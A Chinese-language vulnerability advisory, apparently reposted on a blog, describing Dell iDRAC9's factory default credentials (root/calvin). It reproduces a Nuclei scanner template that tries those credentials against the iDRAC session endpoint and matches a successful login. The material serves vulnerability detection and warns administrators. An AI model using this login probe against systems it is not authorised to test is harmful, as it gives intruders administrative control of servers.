DELL iDRAC9 默认登录凭证漏洞

漏洞信息

漏洞名称: DELL iDRAC9 默认登录凭证漏洞

漏洞类型: 弱口令

漏洞等级: 高危

漏洞描述: DELL iDRAC9是戴尔公司推出的一款远程访问控制器,主要用于服务器硬件的远程管理。它允许管理员通过网络对服务器进行监控、维护和管理,广泛应用于企业级数据中心和云计算环境。该产品因其强大的功能和便捷的管理方式,在企业IT基础设施中占有重要地位。

该漏洞属于默认登录凭证问题,具体表现为iDRAC9系统出厂时预设了默认的用户名和密码(root/calvin)。由于许多管理员在部署后未及时更改这些默认凭证,攻击者可以利用这些信息轻易获得系统的管理权限。这种漏洞的根源在于缺乏强制的初始密码更改策略,以及用户对安全配置的忽视。

此漏洞的安全风险极高,因为攻击者无需任何认证即可直接访问系统管理界面,进而执行任意操作,如更改系统配置、部署恶意软件或窃取敏感数据。由于iDRAC9通常部署在内网环境中,一旦被攻击者利用,可能导致整个内部网络的安全受到威胁。此外,这种漏洞的利用过程简单,可以自动化进行,大大增加了被攻击的可能性。因此,管理员应立即更改默认凭证,并实施更严格的安全措施以防止此类攻击。

产品厂商: DELL

产品名称: DELL iDRAC9

来源: https://github.com/projectdiscovery/nuclei-templates/blob/131683c5e83146c44d5e44f0e71d1abf2cc2d4ed/http%2Fdefault-logins%2Fdell%2Fdell-idrac9-default-login.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

id: dell-idrac9-default-login

info:
name: DELL iDRAC9 - Default Login
author: kophjager007,milo2012
severity: high
description: |
DELL iDRAC9 default login credentials was discovered.
reference:
- https://www.dell.com/support/kbdoc/en-us/000177787/how-to-change-the-default-login-password-of-the-idrac-9
classification:
cwe-id: cwe-798
metadata:
max-request: 1
tags: dell,idrac,default-login

http:
- raw:
- |
POST /sysmgmt/2015/bmc/session HTTP/1.1
Host: {{Hostname}}
User: "{{username}}"
Password: "{{password}}"

payloads:
username:
- root
password:
- calvin
attack: pitchfork

matchers-condition: and
matchers:
- type: regex
name: authresult
regex:
- '"authResult"\s*:\s*0'

- type: status
status:
- 201
- 200



DELL iDRAC9 默认登录凭证漏洞
http://example.com/2025/07/25/github_863978119/
作者
lianccc
发布于
2025年7月25日
许可协议